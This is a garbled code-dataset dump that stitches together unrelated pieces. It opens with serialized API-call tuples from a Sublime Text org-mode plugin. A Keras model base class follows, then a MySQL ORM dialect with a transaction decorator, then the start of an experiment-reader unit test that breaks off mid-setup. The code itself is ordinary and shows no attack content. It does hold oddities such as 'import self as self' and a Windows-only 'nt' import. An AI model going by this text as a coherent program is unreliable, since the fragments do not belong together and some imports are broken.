'OrgExtended.orgparse.date.OrgDate.format_date', 'orgdate.OrgDate.format_date', (['now', '(True)'], {}), '(now, True)\n', (29148, 29159), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((29329, 29352), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (29350, 29352), False, 'import datetime\n'), ((29372, 29411), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(True)'], {}), '(now, True)\n', (29400, 29411), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((34507, 34530), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (34517, 34530), True, 'import OrgExtended.pymitter as evt\n'), ((35241, 35258), 'OrgExtended.orginsertselected.OrgInput', 'insSel.OrgInput', ([], {}), 
'()\n', (35256, 35258), True, 'import OrgExtended.orginsertselected as insSel\n'), ((37023, 37046), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (37033, 37046), True, 'import OrgExtended.pymitter as evt\n'), ((37396, 37415), 'OrgExtended.orgutil.util.RandomString', 'util.RandomString', ([], {}), '()\n', (37413, 37415), True, 'import OrgExtended.orgutil.util as util\n'), ((39290, 39308), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (39300, 39308), True, 'import OrgExtended.pymitter as evt\n'), ((39397, 39420), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (39407, 39420), True, 'import OrgExtended.pymitter as evt\n'), ((39900, 39929), 'OrgExtended.orglinks.CreateLink', 'orglink.CreateLink', (['self.view'], {}), '(self.view)\n', (39918, 39929), True, 'import OrgExtended.orglinks as orglink\n'), ((5633, 5656), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5654, 5656), False, 'import datetime\n'), ((8367, 8400), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_close_if_needed'], {}), '(self.do_close_if_needed)\n', (8375, 8400), True, 'import OrgExtended.pymitter as evt\n'), ((9139, 9193), 're.compile', 're.compile', (['"""^([*]+ (\\\\[\\\\#[a-zA-Z0-9]+\\\\]\\\\s+)?)( )*"""'], {}), "('^([*]+ (\\\\[\\\\#[a-zA-Z0-9]+\\\\]\\\\s+)?)( )*')\n", (9149, 9193), False, 'import re\n'), ((11969, 12018), 're.compile', 're.compile', (["('^([*]+\\\\s+(' + todos + ')?\\\\s*)( )*')"], {}), "('^([*]+\\\\s+(' + todos + ')?\\\\s*)( )*')\n", (11979, 12018), False, 'import re\n'), ((15472, 15494), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15486, 15494), False, 'import sublime\n'), ((16533, 16581), 'OrgExtended.orgnumberedlist.getListAtPointForSorting', 'numberedlist.getListAtPointForSorting', (['self.view'], {}), '(self.view)\n', (16570, 16581), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((17426, 17448), 
'sublime.Region', 'sublime.Region', (['bs', 'be'], {}), '(bs, be)\n', (17440, 17448), False, 'import sublime\n'), ((18706, 18737), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (18727, 18737), False, 'import sublime\n'), ((18750, 18789), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (18768, 18789), True, 'import OrgExtended.orgneovi as nvi\n'), ((19782, 19813), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (19803, 19813), False, 'import sublime\n'), ((19826, 19865), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (19844, 19865), True, 'import OrgExtended.orgneovi as nvi\n'), ((29741, 29762), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (29749, 29762), True, 'import OrgExtended.pymitter as evt\n'), ((30023, 30044), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (30031, 30044), True, 'import OrgExtended.pymitter as evt\n'), ((30621, 30666), 'OrgExtended.orgparse.date.OrgDateFreeFloating.from_str', 'orgdate.OrgDateFreeFloating.from_str', (['dateval'], {}), '(dateval)\n', (30657, 30666), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((31359, 31390), 'sublime.Region', 'sublime.Region', (['insertpt', 'endpt'], {}), '(insertpt, endpt)\n', (31373, 31390), False, 'import sublime\n'), ((32416, 32430), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (32428, 32430), True, 'import OrgExtended.orgparse.node as node\n'), ((32862, 32885), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (32883, 32885), False, 'import datetime\n'), ((32909, 32949), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(False)'], {}), '(now, False)\n', (32937, 32949), True, 'import OrgExtended.orgparse.date as 
orgdate\n'), ((34242, 34259), 'OrgExtended.orginsertselected.OrgInput', 'insSel.OrgInput', ([], {}), '()\n', (34257, 34259), True, 'import OrgExtended.orginsertselected as insSel\n'), ((35355, 35377), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.on_done'], {}), '(self.on_done)\n', (35363, 35377), True, 'import OrgExtended.pymitter as evt\n'), ((35677, 35691), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (35689, 35691), True, 'import OrgExtended.orgparse.node as node\n'), ((36102, 36174), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['self.view', 'node', '"""CUSTOM_ID"""', 'idValue', 'self.onDone'], {}), "(self.view, node, 'CUSTOM_ID', idValue, self.onDone)\n", (36122, 36174), True, 'import OrgExtended.orgproperties as props\n'), ((39562, 39583), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (39570, 39583), True, 'import OrgExtended.pymitter as evt\n'), ((2196, 2209), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (2207, 2209), True, 'import OrgExtended.orgparse.node as node\n'), ((5257, 5265), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (5263, 5265), True, 'import OrgExtended.orgdb as db\n'), ((7868, 7913), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.on_update_timestamps_if_needed'], {}), '(self.on_update_timestamps_if_needed)\n', (7876, 7913), True, 'import OrgExtended.pymitter as evt\n'), ((8111, 8149), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_recurrence_if_needed'], {}), '(self.do_recurrence_if_needed)\n', (8119, 8149), True, 'import OrgExtended.pymitter as evt\n'), ((8212, 8250), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_recurrence_if_needed'], {}), '(self.do_recurrence_if_needed)\n', (8220, 8250), True, 'import OrgExtended.pymitter as evt\n'), ((9962, 9994), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_note_if_needed'], {}), '(self.do_note_if_needed)\n', (9970, 9994), True, 'import OrgExtended.pymitter as 
evt\n'), ((10084, 10092), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (10090, 10092), True, 'import OrgExtended.orgdb as db\n'), ((11144, 11161), 'sublime.version', 'sublime.version', ([], {}), '()\n', (11159, 11161), False, 'import sublime\n'), ((12572, 12580), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (12578, 12580), True, 'import OrgExtended.orgdb as db\n'), ((13030, 13047), 'sublime.version', 'sublime.version', ([], {}), '()\n', (13045, 13047), False, 'import sublime\n'), ((14399, 14421), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14413, 14421), False, 'import sublime\n'), ((14464, 14486), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14478, 14486), False, 'import sublime\n'), ((14783, 14805), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14797, 14805), False, 'import sublime\n'), ((14848, 14870), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14862, 14870), False, 'import sublime\n'), ((15734, 15756), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15748, 15756), False, 'import sublime\n'), ((16682, 16726), 'OrgExtended.orgcheckbox.getListAtPointForSorting', 'checkbox.getListAtPointForSorting', (['self.view'], {}), '(self.view)\n', (16715, 16726), True, 'import OrgExtended.orgcheckbox as checkbox\n'), ((17827, 17835), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (17833, 17835), True, 'import OrgExtended.orgdb as db\n'), ((18325, 18333), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (18331, 18333), True, 'import OrgExtended.orgdb as db\n'), ((18892, 18900), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (18898, 18900), True, 'import OrgExtended.orgdb as db\n'), ((19395, 19403), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (19401, 19403), True, 'import OrgExtended.orgdb as db\n'), ((20631, 20662), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (20652, 
20662), False, 'import sublime\n'), ((20679, 20718), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (20697, 20718), True, 'import OrgExtended.orgneovi as nvi\n'), ((21605, 21613), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (21611, 21613), True, 'import OrgExtended.orgdb as db\n'), ((22260, 22282), 'sublime.Region', 'sublime.Region', (['sp', 'sp'], {}), '(sp, sp)\n', (22274, 22282), False, 'import sublime\n'), ((22629, 22637), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (22635, 22637), True, 'import OrgExtended.orgdb as db\n'), ((23370, 23392), 'sublime.Region', 'sublime.Region', (['sp', 'sp'], {}), '(sp, sp)\n', (23384, 23392), False, 'import sublime\n'), ((23983, 23991), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (23989, 23991), True, 'import OrgExtended.orgdb as db\n'), ((25589, 25597), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (25595, 25597), True, 'import OrgExtended.orgdb as db\n'), ((27578, 27586), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (27584, 27586), True, 'import OrgExtended.orgdb as db\n'), ((30737, 30745), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (30743, 30745), True, 'import OrgExtended.orgdb as db\n'), ((30790, 30804), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (30802, 30804), True, 'import OrgExtended.orgparse.node as node\n'), ((32372, 32380), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (32378, 32380), True, 'import OrgExtended.orgdb as db\n'), ((33356, 33364), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (33362, 33364), True, 'import OrgExtended.orgdb as db\n'), ((33955, 33978), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (33965, 33978), True, 'import OrgExtended.pymitter as evt\n'), ((34308, 34329), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (34316, 34329), True, 'import 
OrgExtended.pymitter as evt\n'), ((34656, 34677), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (34664, 34677), True, 'import OrgExtended.pymitter as evt\n'), ((35086, 35155), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['self.view', 'node', '"""CUSTOM_ID"""', 'text', 'self.onDone'], {}), "(self.view, node, 'CUSTOM_ID', text, self.onDone)\n", (35106, 35155), True, 'import OrgExtended.orgproperties as props\n'), ((35335, 35343), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35341, 35343), True, 'import OrgExtended.orgdb as db\n'), ((35625, 35633), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35631, 35633), True, 'import OrgExtended.orgdb as db\n'), ((35811, 35819), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35817, 35819), True, 'import OrgExtended.orgdb as db\n'), ((35954, 36004), 'OrgExtended.orgproperties.RemoveProperty', 'props.RemoveProperty', (['self.view', 'node', '"""CUSTOM_ID"""'], {}), "(self.view, node, 'CUSTOM_ID')\n", (35974, 36004), True, 'import OrgExtended.orgproperties as props\n'), ((36020, 36028), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (36026, 36028), True, 'import OrgExtended.orgdb as db\n'), ((36073, 36087), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (36085, 36087), True, 'import OrgExtended.orgparse.node as node\n'), ((36983, 36991), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (36989, 36991), True, 'import OrgExtended.orgdb as db\n'), ((37424, 37433), 'OrgExtended.pymitter.Get', 'evt.Get', ([], {}), '()\n', (37431, 37433), True, 'import OrgExtended.pymitter as evt\n'), ((37730, 37738), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (37736, 37738), True, 'import OrgExtended.orgdb as db\n'), ((38438, 38446), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (38444, 38446), True, 'import OrgExtended.orgdb as db\n'), ((39948, 39956), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (39954, 39956), 
True, 'import OrgExtended.orgdb as db\n'), ((40215, 40240), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.InsertLink'], {}), '(self.InsertLink)\n', (40223, 40240), True, 'import OrgExtended.pymitter as evt\n'), ((15854, 15876), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15868, 15876), False, 'import sublime\n'), ((25691, 25699), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (25697, 25699), True, 'import OrgExtended.orgdb as db\n'), ((27651, 27659), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (27657, 27659), True, 'import OrgExtended.orgdb as db\n'), ((31700, 31721), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (31708, 31721), True, 'import OrgExtended.pymitter as evt\n'), ((34294, 34302), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (34300, 34302), True, 'import OrgExtended.orgdb as db\n'), ((34997, 35005), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35003, 35005), True, 'import OrgExtended.orgdb as db\n'), ((35054, 35068), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (35066, 35068), True, 'import OrgExtended.orgparse.node as node\n'), ((38511, 38519), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (38517, 38519), True, 'import OrgExtended.orgdb as db\n'), ((39767, 39790), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (39788, 39790), False, 'import datetime\n'), ((2444, 2457), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (2455, 2457), True, 'import OrgExtended.orgparse.node as node\n'), ((15030, 15052), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15044, 15052), False, 'import sublime\n'), ((15111, 15133), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (15125, 15133), False, 'import sublime\n'), ((31302, 31315), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (31313, 31315), True, 'import OrgExtended.orgparse.node as 
node\n'), ((31441, 31454), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (31452, 31454), True, 'import OrgExtended.orgparse.node as node\n'), ((6010, 6033), 'OrgExtended.orgagenda.EnsureDateTime', 'oa.EnsureDateTime', (['next'], {}), '(next)\n', (6027, 6033), True, 'import OrgExtended.orgagenda as oa\n'), ((25126, 25149), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (25147, 25149), False, 'import sublime\n'), ((25389, 25412), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (25410, 25412), False, 'import sublime\n'), ((26988, 27011), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (27009, 27011), False, 'import sublime\n'), ((27255, 27278), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (27276, 27278), False, 'import sublime\n'), ((33007, 33020), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (33018, 33020), True, 'import OrgExtended.orgparse.node as node\n'), ((6191, 6214), 'OrgExtended.orgagenda.EnsureDateTime', 'oa.EnsureDateTime', (['next'], {}), '(next)\n', (6208, 6214), True, 'import OrgExtended.orgagenda as oa\n')] |
from nt import DirEntry
import os
import self as self
from keras import Model as KerasModel
class Model(object):
    """Base class for the different models in this project.

    Subclasses are expected to build a Keras model into ``self._model``;
    the helpers here read training assets from disk, load weights and
    compile the model.  All helpers return ``self`` so calls can chain.
    """

    # The files used to parse the model (path -> file contents).
    _files: dict = {}
    # The files' contents as one long string.
    _raw_content: str = ''
    # Path to the assets to read from.
    _assets_path: str = 'assets_test'
    # The Keras model that is used.  The annotation is a lazy string so the
    # class no longer needs keras (or the "import self" hack) at import time.
    _model: "KerasModel" = None
    # The path where to save and use the model from.
    _model_path: str = None
    # Activation method to use.
    _activation_method: str = 'softmax'
    # Optimizer method to use.
    _optimizer: str = 'adam'
    # Loss method to use.
    _loss_method: str = 'categorical_crossentropy'
    # The encoding used on the training data.
    _training_data_encoding: str = 'utf-8'

    def __init__(self):
        # BUGFIX: _files was a class-level dict mutated through instances,
        # so every Model silently shared one asset cache.  Give each
        # instance its own copies of the accumulating attributes.
        self._files = {}
        self._raw_content = ''

    def print_model_summary(self) -> "Model":
        """Print a model summary if the model has been created.

        :return: self (fluent interface)
        """
        if self._model:
            self._model.summary()
        else:
            print('No model has been created yet')
        # BUGFIX: previously returned None on the success path, which broke
        # fluent chaining exactly when a model existed.
        return self

    def load_weights(self, weights: str) -> "Model":
        """Load weights from the given weights file and recompile.

        :param weights: path to the weights file
        :return: self (fluent interface)
        """
        if not self._model:
            print('No model has been created, please create the model first!')
            return self
        self._model.load_weights(weights)
        self.compile_model()
        return self

    def compile_model(self) -> "Model":
        """Compile the model with the configured loss and optimizer.

        :return: self (fluent interface)
        """
        if not self._model:
            print('No model has been created, please create the model first!')
            return self
        self._model.compile(loss=self._loss_method, optimizer=self._optimizer)
        return self

    def _read_data_from_assets(self) -> "Model":
        """Read and parse the data from the assets folder into the object.

        :return: self
        """
        for directory in os.scandir(self._get_assets_full_path()):
            self._parse_directory(directory)
        return self

    def _concat_assets_content_to_one_string(self) -> "Model":
        """Concatenate all asset contents into one lowercased string.

        :return: self
        """
        for key, value in self._files.items():
            self._raw_content = self._raw_content + value
        self._raw_content = self._raw_content.lower()
        return self

    def _parse_directory(self, directory: os.DirEntry) -> "Model":
        """Recursively parse the given directory, parsing any found files.

        :param directory: directory entry to walk
        :return: self
        """
        for entry in os.scandir(directory):
            if entry.is_dir():
                self._parse_directory(entry)
            else:
                self._parse_file(entry)
        return self

    def _parse_file(self, file: os.DirEntry) -> "Model":
        """Try to parse the given file into the self._files dictionary.

        Files that cannot be read/decoded are reported and skipped.

        :param file: file entry to read
        :return: self
        """
        try:
            # The with-statement closes the file; the old explicit close()
            # inside the block was redundant.
            with open(file.path, 'r', encoding=self._training_data_encoding) as file_reader:
                data = file_reader.read()
        except Exception:
            print(f"Unable to parse file: {file.path}")
            return self
        self._files[file.path] = data
        return self

    def _get_assets_full_path(self) -> str:
        """Return the full path to the directory where the assets live.

        :return: str
        """
        return os.path.join(os.path.dirname(os.path.dirname(__file__)), self._assets_path)
| [
"self._parse_directory",
"self._get_assets_full_path",
"self.compile_model",
"self._model.load_weights",
"os.scandir",
"self._raw_content.lower",
"os.path.dirname",
"self._model.summary",
"self._model.compile",
"self._parse_file",
"self._files.items"
] | [((1510, 1543), 'self._model.load_weights', 'self._model.load_weights', (['weights'], {}), '(weights)\n', (1534, 1543), True, 'import self as self\n'), ((1552, 1572), 'self.compile_model', 'self.compile_model', ([], {}), '()\n', (1570, 1572), True, 'import self as self\n'), ((1870, 1940), 'self._model.compile', 'self._model.compile', ([], {'loss': 'self._loss_method', 'optimizer': 'self._optimizer'}), '(loss=self._loss_method, optimizer=self._optimizer)\n', (1889, 1940), True, 'import self as self\n'), ((2469, 2488), 'self._files.items', 'self._files.items', ([], {}), '()\n', (2486, 2488), True, 'import self as self\n'), ((2577, 2602), 'self._raw_content.lower', 'self._raw_content.lower', ([], {}), '()\n', (2600, 2602), True, 'import self as self\n'), ((2886, 2907), 'os.scandir', 'os.scandir', (['directory'], {}), '(directory)\n', (2896, 2907), False, 'import os\n'), ((1094, 1115), 'self._model.summary', 'self._model.summary', ([], {}), '()\n', (1113, 1115), True, 'import self as self\n'), ((2171, 2199), 'self._get_assets_full_path', 'self._get_assets_full_path', ([], {}), '()\n', (2197, 2199), True, 'import self as self\n'), ((2214, 2246), 'self._parse_directory', 'self._parse_directory', (['directory'], {}), '(directory)\n', (2235, 2246), True, 'import self as self\n'), ((2956, 2984), 'self._parse_directory', 'self._parse_directory', (['entry'], {}), '(entry)\n', (2977, 2984), True, 'import self as self\n'), ((3019, 3042), 'self._parse_file', 'self._parse_file', (['entry'], {}), '(entry)\n', (3035, 3042), True, 'import self as self\n'), ((3861, 3886), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3876, 3886), False, 'import os\n')] |
# coding=utf-8
import re
import traceback
from pesto_common.config.configer import Configer
from pesto_common.log.logger_factory import LoggerFactory
from pesto_orm.core.base import db_config
from pesto_orm.core.executor import ExecutorFactory
from pesto_orm.core.model import BaseModel
from pesto_orm.core.repository import BaseRepository
from pesto_orm.dialect.base import DefaultDialect
# Module-level logger shared by the MySQL dialect/transaction code below.
logger = LoggerFactory.get_logger('dialect.mysql.domain')
class MySQLDialect(DefaultDialect):
    """MySQL flavour of the SQL dialect: type name plus LIMIT/OFFSET paging."""

    def get_db_type(self):
        """Identifier of the database type this dialect targets."""
        return 'mysql'

    def paginate_with(self, sql, page_number, page_size):
        """Wrap *sql* with MySQL LIMIT/OFFSET pagination.

        A first-page, single-row request whose statement already matches
        the dialect's "select single" pattern is returned unchanged.
        """
        wants_single_row = page_number == 1 and page_size == 1
        if wants_single_row and re.match(DefaultDialect.select_single_pattern, sql) is not None:
            return sql
        skipped_rows = page_size * (page_number - 1)
        return '%s LIMIT %d OFFSET %d' % (sql, page_size, skipped_rows)
# Only wire up the MySQL driver when the configuration selects it, so this
# module can still be imported when another backend is configured.
db_type = Configer.get('db.type')
if db_type == 'mysql':
    import mysql.connector as connector
    # Hand the driver module to the core layer and select the pure-Python
    # protocol implementation of mysql-connector.
    db_config['target'] = connector
    db_config['use_pure'] = True
    from mysql.connector.conversion import MySQLConverter

    class NumpyMySQLConverter(MySQLConverter):
        ''' A mysql.connector Converter that handles Numpy types '''

        def _float32_to_mysql(self, value):
            # Unbox numpy scalar types to builtins the driver can serialize.
            return float(value)

        def _float64_to_mysql(self, value):
            return float(value)

        def _int32_to_mysql(self, value):
            return int(value)

        def _int64_to_mysql(self, value):
            return int(value)

    db_config['converter_class'] = NumpyMySQLConverter

# Module-wide executor and dialect shared by the model/repository classes
# and the transaction decorator below.
mysqlExecutor = ExecutorFactory.get_executor(db_config=db_config)
mysqlDialect = MySQLDialect()
class MysqlBaseModel(BaseModel):
    """ORM model base bound to the module's shared MySQL dialect/executor."""

    def __init__(self, db_name=None, table_name=None, table_alias=None, primary_key='id'):
        # Delegate straight to BaseModel; nothing MySQL-specific to set up.
        super(MysqlBaseModel, self).__init__(db_name, table_name, table_alias, primary_key)

    def get_dialect(self):
        # Every MySQL model shares the single module-level dialect instance.
        return mysqlDialect

    def get_executor(self):
        # Likewise, one executor is shared module-wide.
        return mysqlExecutor
class MysqlBaseRepository(BaseRepository):
    """Repository base bound to the module's shared MySQL dialect/executor."""

    def __init__(self, model_class=None):
        # Delegate straight to BaseRepository; no MySQL-specific state.
        super(MysqlBaseRepository, self).__init__(model_class)

    def get_dialect(self):
        # Shared module-level dialect instance.
        return mysqlDialect

    def get_executor(self):
        # Shared module-level executor instance.
        return mysqlExecutor
def transaction(rollback_exceptions=()):
    """Decorator that runs the wrapped function inside a DB transaction.

    On success the transaction is committed and the function's return value
    is propagated.  If the function raises: the transaction is rolled back
    when *rollback_exceptions* is empty (roll back on anything) or when the
    exception's class is listed in it; otherwise the work so far is
    committed.  The exception is always re-raised, and the transaction
    handle is always closed.

    BUGFIX: the default argument was a shared mutable list (now a tuple).
    BUGFIX: the wrapped function's return value was collected but never
    returned to the caller; it is now propagated.

    :param rollback_exceptions: exception classes that trigger a rollback
        (empty means "roll back on any exception")
    """
    def wrap(func):
        # Local import keeps this module's top-level imports untouched.
        from functools import wraps

        @wraps(func)  # preserve the wrapped function's name and docstring
        def to_do(*args, **kwargs):
            try:
                mysqlExecutor.begin_transaction()
                return_value = func(*args, **kwargs)
                logger.info('Transaction method: %s', func.__name__)
                mysqlExecutor.commit_transaction()
                return return_value
            except Exception as e:
                if len(rollback_exceptions) == 0 or e.__class__ in rollback_exceptions:
                    mysqlExecutor.rollback_transaction()
                    logger.error('Method execute error. method: %s, error:%s, transaction roll back.',
                                 func.__name__, traceback.format_exc())
                else:
                    # Exception type is explicitly tolerated: keep the work.
                    mysqlExecutor.commit_transaction()
                raise e
            finally:
                mysqlExecutor.close_transaction()
        return to_do
    return wrap
| [
"traceback.format_exc",
"pesto_orm.core.executor.ExecutorFactory.get_executor",
"re.match",
"pesto_common.log.logger_factory.LoggerFactory.get_logger",
"pesto_common.config.configer.Configer.get"
] | [((401, 449), 'pesto_common.log.logger_factory.LoggerFactory.get_logger', 'LoggerFactory.get_logger', (['"""dialect.mysql.domain"""'], {}), "('dialect.mysql.domain')\n", (425, 449), False, 'from pesto_common.log.logger_factory import LoggerFactory\n'), ((879, 902), 'pesto_common.config.configer.Configer.get', 'Configer.get', (['"""db.type"""'], {}), "('db.type')\n", (891, 902), False, 'from pesto_common.config.configer import Configer\n'), ((1591, 1640), 'pesto_orm.core.executor.ExecutorFactory.get_executor', 'ExecutorFactory.get_executor', ([], {'db_config': 'db_config'}), '(db_config=db_config)\n', (1619, 1640), False, 'from pesto_orm.core.executor import ExecutorFactory\n'), ((661, 712), 're.match', 're.match', (['DefaultDialect.select_single_pattern', 'sql'], {}), '(DefaultDialect.select_single_pattern, sql)\n', (669, 712), False, 'import re\n'), ((3227, 3249), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3247, 3249), False, 'import traceback\n')] |
import os
import re
import unittest
import shutil
import subprocess
import logging
import zipfile
from io import BytesIO
from ..experiment.file_storage_driver import FileStorageDriver
from ..experiment.experiment_reader import ExperimentReader
from ..experiment.experiment_writer import ExperimentWriter
class ExperimentReaderTest(unittest.TestCase):
    """End-to-end tests for ExperimentReader over a file-backed experiment store.

    setUp registers two Surround projects under ./temporary, scaffolds them with
    the ``surround`` CLI, records several experiments through ExperimentWriter,
    and remembers the generated (timestamp-named) experiment folders so each
    test can look them up again through ExperimentReader.
    """

    def setUp(self):
        # Register both projects in the temporary experiment store.
        writer = ExperimentWriter(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        writer.write_project("test_project", "test_description")
        writer.write_project("test_project_two", "test_description_2")
        # Scaffold the projects on disk via the surround CLI ('-w no' skips the wizard).
        process = subprocess.Popen(['surround', 'init', '-p', 'test_project', '-d', 'test_description', '-w', 'no'], cwd="temporary", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        process.wait()
        process.stdout.close()
        process.stderr.close()
        process = subprocess.Popen(['surround', 'init', '-p', 'test_project_two', '-d', 'test_description', '-w', 'no'], cwd="temporary", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        process.wait()
        process.stdout.close()
        process.stderr.close()
        # Give each project a dummy model artifact so experiments have files to store.
        os.makedirs(os.path.join("temporary", "test_project", "models"))
        with open("temporary/test_project/models/test.model", "w+") as f:
            f.write("WEIGHTS")
        os.makedirs(os.path.join("temporary", "test_project_two", "models"))
        with open("temporary/test_project_two/models/test.model", "w+") as f:
            f.write("WEIGHTS")
        # Record two experiments per project; logging output should be captured
        # into each experiment's log file. The very last experiment deliberately
        # logs nothing.
        writer.start_experiment("test_project", "temporary/test_project", args={'mode': 'batch'}, notes=['test', 'note'])
        logging.info("test_log")
        writer.stop_experiment(metrics={'test_metric': 0.1})
        writer.start_experiment("test_project", "temporary/test_project", args={'mode': 'batch'}, notes=['test', 'note'])
        logging.info("test_log")
        writer.stop_experiment(metrics={'test_metric': 0.2})
        writer.start_experiment("test_project_two", "temporary/test_project_two", args={'mode': 'batch'}, notes=['test', 'note'])
        logging.info("test_log")
        writer.stop_experiment(metrics={'test_metric': 0.2})
        writer.start_experiment("test_project_two", "temporary/test_project_two", args={'mode': 'batch'}, notes=['test', 'note'])
        writer.stop_experiment(metrics={'test_metric': 0.3})
        # Remember the generated experiment folder names; sorted order is
        # chronological because the folders appear to be timestamp-named.
        self.folder_names = os.listdir("temporary/experiments/experimentation/test_project/experiments")
        self.folder_names_2 = os.listdir("temporary/experiments/experimentation/test_project_two/experiments")
        self.folder_names = sorted(self.folder_names)
